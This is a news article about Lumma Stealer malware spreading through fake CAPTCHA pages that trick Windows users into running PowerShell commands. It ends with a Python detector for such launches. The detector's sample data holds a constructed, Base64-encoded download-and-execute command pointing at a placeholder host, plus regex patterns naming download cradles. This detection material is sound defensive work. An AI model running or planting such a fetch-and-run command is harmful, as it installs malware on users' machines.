Lumma Stealer Malware: New Threat Targeting Windows Users

Aayushi Jain

A new threat is targeting Windows users. According to a recent report by cybersecurity firm CloudSEK, the Lumma Stealer malware is allegedly now using a new phishing method to spread on Windows devices.

Cybersecurity experts are increasingly concerned about this campaign and advise organizations and individuals to strengthen their defences.

New Phishing Tactic: Fake Human Verification Pages

According to the CloudSEK report, Lumma Stealer is being distributed through fraudulent human verification pages that mimic legitimate systems such as Google's CAPTCHA. Instead of performing any real verification, the page instructs victims to run unfamiliar commands, which download and execute the malware on their devices.

Malicious Distribution Channels and Tactics

The researchers also found that several phishing websites are used for distribution. These sites mostly present a fake verification process that prompts victims to execute commands, including PowerShell scripts, which then download and install Lumma Stealer. Hosting the fake pages on Content Delivery Networks makes them even harder to identify and block.

Malicious URLs

The report lists several URLs that were detected spreading the Lumma Stealer malware.


These URLs rely on several CDNs and various storage services to host the malicious pages. In addition, the attackers use base64 encoding and clipboard manipulation to evade detection.

Mitigation Strategy for Users and Organizations

As this is a phishing-based attack, traditional security patches do not apply. Users and organizations should therefore adopt several key strategies to counter Lumma Stealer:

Awareness Training: Educate users and employees against phishing to avoid falling victim to such traps.

Endpoint Protection: Installing and keeping up to date a trustworthy endpoint protection solution can help detect and block PowerShell-based attacks.

Update: All systems should be kept updated and patched to reduce the vulnerabilities that Lumma Stealer could exploit.
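The PowerShell-based launch described above leaves a recognisable trace in process-creation telemetry: powershell.exe spawned from an interactive parent (the Run dialog is a child of explorer.exe), with an encoded command that decodes to a download-and-execute cradle. The following detector is an added example, not code from CloudSEK or this article; it runs over constructed Sysmon-style process-creation records, and the encoded command it decodes is a constructed placeholder pointing at example.invalid.

```python
import base64
import re
from typing import Optional

# Constructed sample (not real telemetry): a download-and-execute command
# encoded as UTF-16LE Base64, the form PowerShell's -EncodedCommand expects.
_DEMO_PLAINTEXT = "iex (iwr 'https://example.invalid/verify').Content"
_DEMO_ENCODED = base64.b64encode(_DEMO_PLAINTEXT.encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed Sysmon Event ID 1 style records
    # Fake-CAPTCHA pattern: Run dialog (explorer.exe) -> hidden, encoded PowerShell
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe -w hidden -enc {_DEMO_ENCODED}"},
    # Benign: script file run by the task scheduler
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    # Benign: encoded but harmless, launched by an admin tool
    {"Image": _PS, "ParentImage": r"C:\Program Files\Admin\tool.exe",
     "CommandLine": "powershell.exe -enc " + base64.b64encode(
         "Get-Service | Out-Null".encode("utf-16-le")).decode()},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e[ncodema]*\s+([A-Za-z0-9+/=]{16,})")
CRADLE = re.compile(r"(?i)\b(iex|invoke-expression|iwr|invoke-webrequest|"
                    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer)\b")
INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event: dict) -> list[str]:
    """Indicators that this process creation matches the fake-CAPTCHA launch chain."""
    reasons: list[str] = []
    if not event["Image"].lower().endswith("powershell.exe"):
        return reasons
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        reasons.append("encoded command")
    if event["ParentImage"].lower().endswith(INTERACTIVE_PARENTS):
        reasons.append("launched interactively (Run dialog / shell)")
    if re.search(r"(?i)-w(indowstyle)?\s+hidden", event["CommandLine"]):
        reasons.append("hidden window")
    if CRADLE.search(decoded or event["CommandLine"]):
        reasons.append("download-and-execute cradle")
    return reasons

def find_suspects(events: list[dict], min_reasons: int = 3) -> list[int]:
    """Indices of events carrying at least min_reasons indicators."""
    return [i for i, e in enumerate(events) if len(score_event(e)) >= min_reasons]
```

Scoring on several indicators rather than on the encoded flag alone keeps legitimate encoded administrative commands (the third sample) below the alert threshold.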

The Requirement of Deeper Cybersecurity Measures

The rise of Lumma Stealer underlines the urgent need for vigilance in cybersecurity. Attacker tactics change over time as they refine their methods, so staying informed about protective measures in advance is a person's best card for safeguarding sensitive information that might otherwise be compromised.
